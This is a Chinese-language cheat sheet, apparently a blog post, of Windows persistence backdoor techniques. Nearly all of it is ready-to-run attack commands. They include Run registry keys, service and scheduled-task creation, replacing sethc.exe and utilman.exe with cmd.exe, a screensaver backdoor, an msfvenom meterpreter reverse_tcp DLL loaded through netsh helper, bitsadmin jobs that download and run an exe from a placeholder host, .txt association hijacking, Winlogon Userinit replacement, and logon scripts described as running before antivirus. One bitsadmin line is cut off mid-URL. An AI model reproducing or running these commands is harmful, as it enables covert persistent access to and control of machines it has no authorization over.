启动项
在启动路径中存入后门
1
| C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
|
启动项注册表
1
2
3
4
| HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
服务
自启动服务
1
2
3
4
| sc create "aaa" binpath= "C:\Users\Administrator\Desktop\test.exe"
sc description "aaa" "description" 设置服务的描述字符串
sc config "aaa" start= auto 设置这个服务为自动启动
net start "aaa" 启动服务
|
计划任务
1
| schtasks /create /sc minute /mo 5 /tn "xxx" /tr C:\Windows\System32\cmd.exe
|
替换粘滞键
1
2
| copy c:\windows\system32\sethc.ex c:\windows\system32\sethc.exe.bak
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
|
utilman.exe
类似粘滞键用法,将其替换为cmd.exe
1
2
| ctrl+u启动
C:\Windows\System32\utilman.exe
|
其他类似的
1
2
3
4
5
| 屏幕键盘: C:\Windows\System32\osk.exe
放大镜: C:\Windows\System32\Magnify.exe
旁白: C:\Windows\System32\Narrator.exe
显示切换器 C:\Windows\System32\DisplaySwitch.exe
应用切换器: C:\Windows\System32\AtBroker.exe
|
屏保程序
生成后门exe文件,后缀修改为.scr
设置屏保程序
修改屏保程序为后门xx.scr
1
| reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "c:\xx.scr" /f
|
netsh与helper.dll
1
2
3
4
5
6
| 利用msf生成dll文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll > /tmp/netsh_helper.dll
上传到目标机器
在目标机器上执行:
netsh add helper c:\netsh_helper.dll
将netsh添加自启动,每次netsh实用程序启动时,都会执行DLL,并且将建立通信
|
Bitsadmin
window7以上自带Bitsadmin即后台智能传输服务,用于创建和管理文件传输,可使用它添加bits任务,利用其特性每次重新启动执行指定的程序
1
| bitsadmin /transfer n http:
|
也可创建定时触发的计划
1
2
3
4
5
| bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://xx.xx.xx.xx/1.EXE" "C:\1.exe"
bitsadmin /SetNotifyCmdLine backdoorC:\1.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor
|
文件关联
1
2
3
4
| 查看文件扩展名关联
assoc .txt
查看文件扩展名关联的目标文件
ftype txtfile
|
可以看到.txt文件被关联到txtfile类型,txtfile对应目标文件为”%SystemRoot%\system32\NOTEPAD.EXE %1”
那么如果将指向NOTEPAD.EXE的文件修改为指向我们设置的恶意程序,即可在打开txt时执行恶意文件
在注册表修改\HKEY_CLASS_ROOT\txtfile\shell\open\command值为目标恶意程序,例如修改为cmd.exe
1
| reg add "HKCR\txtfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "C:\Windows\system32\cmd.exe %1" /f
|
Winlogon
winlogon.exe在用户还没登录系统之前就已经存在,并与密码验证相关的重要任务精密相关。在用户登录时,Winlogon进程负责将用户配置文件加载到注册表中
将其注册表指向文件替换为恶意文件
1
2
| reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\cmd.exe," /f
|
Logon Scripts后门
Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截。
注册表位置:
HKEY_CURRENT_USER\Environment
添加新键值对,值为恶意程序路径